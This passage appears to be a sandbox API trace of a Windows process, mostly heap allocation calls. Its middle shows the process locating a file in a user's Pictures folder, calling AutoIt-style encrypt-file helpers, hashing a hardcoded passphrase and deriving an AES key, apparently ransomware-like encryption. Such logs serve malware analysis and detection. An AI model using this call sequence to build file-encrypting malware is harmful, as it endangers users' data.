dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0087.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0087.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.752] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0087.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0087.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0087.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0087.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0087.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0087.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0087.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0087.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0087.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0087.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0087.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0087.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0087.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0087.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0087.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0087.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0087.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0087.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0087.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0087.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0087.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0087.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0087.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0087.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0087.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0087.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0087.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0087.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0087.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0087.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0087.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0087.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0087.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0087.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359a68 | out: hHeap=0x1780000) returned 1 [0087.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0087.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0087.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0087.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0087.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0087.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0087.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0087.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0087.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0087.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0087.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0087.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0087.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0087.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0087.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0087.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0087.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0087.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0087.754] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9bf0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0087.754] CloseHandle (hObject=0x298) returned 1 [0087.754] FreeLibrary (hLibModule=0x772d0000) returned 1 [0087.754] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0087.754] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\eY_MSASCT-tpPguP.bmp", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66b95a40, ftCreationTime.dwHighDateTime=0x1d5ed44, ftLastAccessTime.dwLowDateTime=0xe0c46f90, ftLastAccessTime.dwHighDateTime=0x1d5e287, ftLastWriteTime.dwLowDateTime=0xe0c46f90, ftLastWriteTime.dwHighDateTime=0x1d5e287, nFileSizeHigh=0x0, nFileSizeLow=0x1463f, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="eY_MSASCT-tpPguP.bmp", cAlternateFileName="EY_MSA~1.BMP")) returned 0x41ac740 [0087.755] FindClose (in: hFindFile=0x41ac740 | out: hFindFile=0x41ac740) returned 1 [0087.755] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0087.755] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0087.755] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0087.755] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.755] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0087.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0087.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0087.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0087.755] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0087.756] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0087.756] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0087.756] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0087.756] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0087.756] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0087.756] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0087.756] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.756] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0087.756] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0087.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca580, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0087.756] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0087.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0087.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0087.757] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0087.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0087.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0087.757] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.757] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0087.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca508, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0087.757] CryptHashData (hHash=0x41ac740, pbData=0x17e2848, dwDataLen=0x22, dwFlags=0x1) returned 1 [0087.757] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.757] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0087.757] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0087.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca490, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0087.757] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac740, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac780) returned 1 [0087.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0087.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea0b8 [0087.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0087.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0087.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0087.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0087.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0087.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0087.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0087.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0087.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0087.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0087.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0087.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0087.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0087.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0087.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0087.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0087.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0087.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0087.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0087.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0087.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0087.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0087.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0087.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0087.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0087.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0087.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0087.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9a40 [0087.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0087.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0087.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0087.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0087.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0087.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0087.759] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0087.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0087.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0087.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0087.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0087.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0087.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0087.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0087.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca958 [0087.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca970 [0087.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca880 [0087.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0087.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7f0 [0087.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca928 [0087.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca838 [0087.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa60 [0087.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0087.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa48 [0087.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0087.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7d8 [0087.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0087.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0087.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9b8 [0087.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0087.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca898 [0087.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9a0 [0087.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0087.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9d0 [0087.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8f8 [0087.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0087.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0087.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0087.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0087.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0087.760] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca850 [0087.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0087.760] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0087.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0087.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0087.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0087.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0087.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0087.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0087.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0087.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0087.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0087.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0087.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0087.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0087.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0087.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0087.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0087.760] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0087.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0087.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0087.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0087.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0087.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0087.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0087.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0087.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0087.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0087.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0087.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0087.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0087.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796de8 [0087.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0087.761] 